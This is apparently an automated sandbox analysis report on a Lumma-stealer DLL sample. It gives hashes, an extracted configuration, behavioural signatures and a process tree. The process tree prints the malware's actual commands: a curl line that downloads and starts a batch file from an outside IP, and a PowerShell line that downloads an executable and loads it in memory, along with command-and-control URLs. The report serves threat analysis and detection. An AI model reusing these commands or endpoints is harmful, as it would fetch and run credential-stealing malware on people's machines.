Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
94s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21/01/2025, 18:41
Static task
static1
Behavioral task
behavioral1
Sample
b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
Resource
win7-20240903-en
General
-
Target
b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
-
Size
80KB
-
MD5
07fd51e1e8368144ea403137a671b84c
-
SHA1
b41a78c43c5bf58f6664cb455130c9501c370f05
-
SHA256
b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f
-
SHA512
854a57be09cb09217d268f9e5c2d9ce5da8cbed1fa75c3ec38cc2f1b323377cdbd4db29687fa01e186a1cad6a2ee2e18f8645f98f551eeaa9805269a21354dd7
-
SSDEEP
1536:Y2ShYtT4To+GdOfoPXRr9tXLtAuQeSVdJssWdcd7IW3+ZR+ueK:Y2z0To+GdlhrbwJJ7IW3+n+ue
Malware Config
Extracted
http://147.45.44.131/infopage/ioubcs.exe
http://147.45.44.131/infopage/ioubcs.exe
Extracted
lumma
https://factlosserk.click/api
Signatures
-
Lumma family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 15 4104 powershell.exe -
Downloads MZ/PE file
-
pid Process 4104 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4104 set thread context of 4976 4104 powershell.exe 92 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4104 powershell.exe 4104 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4104 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2112 wrote to memory of 4980 2112 regsvr32.exe 83 PID 2112 wrote to memory of 4980 2112 regsvr32.exe 83 PID 2112 wrote to memory of 4980 2112 regsvr32.exe 83 PID 4980 wrote to memory of 3512 4980 regsvr32.exe 84 PID 4980 wrote to memory of 3512 4980 regsvr32.exe 84 PID 4980 wrote to memory of 3512 4980 regsvr32.exe 84 PID 3512 wrote to memory of 5032 3512 cmd.exe 86 PID 3512 wrote to memory of 5032 3512 cmd.exe 86 PID 3512 wrote to memory of 5032 3512 cmd.exe 86 PID 3512 wrote to memory of 2936 3512 cmd.exe 87 PID 3512 wrote to memory of 2936 3512 cmd.exe 87 PID 3512 wrote to memory of 2936 3512 cmd.exe 87 PID 2936 wrote to memory of 4104 2936 cmd.exe 89 PID 2936 wrote to memory of 4104 2936 cmd.exe 89 PID 2936 wrote to memory of 4104 2936 cmd.exe 89 PID 4104 wrote to memory of 4696 4104 powershell.exe 90 PID 4104 wrote to memory of 4696 4104 powershell.exe 90 PID 4104 wrote to memory of 4696 4104 powershell.exe 90 PID 4696 wrote to memory of 2392 4696 csc.exe 91 PID 4696 wrote to memory of 2392 4696 csc.exe 91 PID 4696 wrote to memory of 2392 4696 csc.exe 91 PID 4104 wrote to memory of 4976 4104 powershell.exe 92 PID 4104 wrote to memory of 4976 4104 powershell.exe 92 PID 4104 wrote to memory of 4976 4104 powershell.exe 92 PID 4104 wrote to memory of 4976 4104 powershell.exe 92 PID 4104 wrote to memory of 4976 4104 powershell.exe 92 PID 4104 wrote to memory of 4976 4104 powershell.exe 92 PID 4104 wrote to memory of 4976 4104 powershell.exe 92 PID 4104 wrote to memory of 4976 4104 powershell.exe 92 PID 4104 wrote to memory of 4976 4104 powershell.exe 92
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll1⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\SysWOW64\curl.execurl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat4⤵PID:5032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K AppS.bat4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$url = 'http://147.45.44.131/infopage/ioubcs.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccpzn4is\ccpzn4is.cmdline"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8ACB.tmp" "c:\Users\Admin\AppData\Local\Temp\ccpzn4is\CSC9B274A1535D441B8828BEEB83A7F14A8.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:2392
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- System Location Discovery: System Language Discovery
PID:4976
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5016b6fcfecdb1b5ed2c1ccf2c391a814
SHA1f4f99950557e15f0de8dfa8d2f98df994788d41c
SHA2565b1d9a912ec8fabaf79700681567a3505f3e5cb641ba0f5b41179ef43e44a516
SHA512c01cd78d0f1d9567b82d5f50445d6b67dd16540e6d2a7de9c180ad3fcaabdf86e109c78cb12adc36b7f3395bdaa96cc3273b7b56ad66bff0ea12398cb0db762d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD5af563fda59513de1cf9bd54c842930f5
SHA1bb0ccf2bfa7f3a6388e6e6105528a34a8d1b1fef
SHA25634b6ad6b7dff40171dea8e08bfebcbfeeb809a063c0b51f296c39942dfea05f9
SHA512b2435a49e49ebfd9be6212163345668181776e123850000612f27cca84c22dc35a6bd29c1402631145e3e0f7214cbf86215da9a66a0e0e2cef9654ae4a52eb6b
-
Filesize
5KB
MD5244582a493f376d9c0f5672292d11ff2
SHA195e5011b114869175aebca27f73b11a9b0a2360b
SHA256ed786fd429082e725242f54db70f1a249c8deb54acb404bf27581fb523915c87
SHA51259e4943cddd994af1ff8f724eb83065abca723891ab250a3c0a047e612111329f20a2fdba8dafd587c8f638f192b91c2a97d48503df59d3bf6dc7aec766d0d41
-
Filesize
652B
MD5e68fd1932e84a119b2875f57b5403f16
SHA1a360ec1208a49b7d722b3b9d98a2dbf8ca9bea3b
SHA2561baf0c41e97d6e57b3feac57efac872099c6fd1c2098eeaa0457ddc7df18d1da
SHA512fe7f730c3dfda414a2525489c8c01bc5e4da2cf4310904dfd4090f1105ed4bf6d0cd170b721a4d56b951bbadd63de9b0f721e539897421f514a9acfa85868f2e
-
Filesize
10KB
MD59a280bef5048674eed1b619db8e0c654
SHA1f849de0496358992d1c0d40562da1aaede680453
SHA25684a03780f5ebbf7989a4741b7a51206ac0b64562f2164af7427b5e1dac885d30
SHA5126a4a1dba810d56dd64238d90e927b048570dbea05ec453826c23d2e267bf960e533ff9446827cba458f7c564b036bbe42613d5d3d7b68dd084cf4a17b2d2be5f
-
Filesize
204B
MD55d29a30a35c631cf07f7c4b210c6792b
SHA1ebe0a3146c53df90a74f45bb865909083f38ad54
SHA25640d19c7663f72a5c5908aff2d8e5e4abc641eb8041c7717ddd9d30be5126f89c
SHA512db82782b7d2a160a38e4e8bea2f30e211b42ca525841ff395f215221ad3955c6120e09e1a2fca7522db6f587ae1e2110ba710cf610a2de5234da32f777bcf799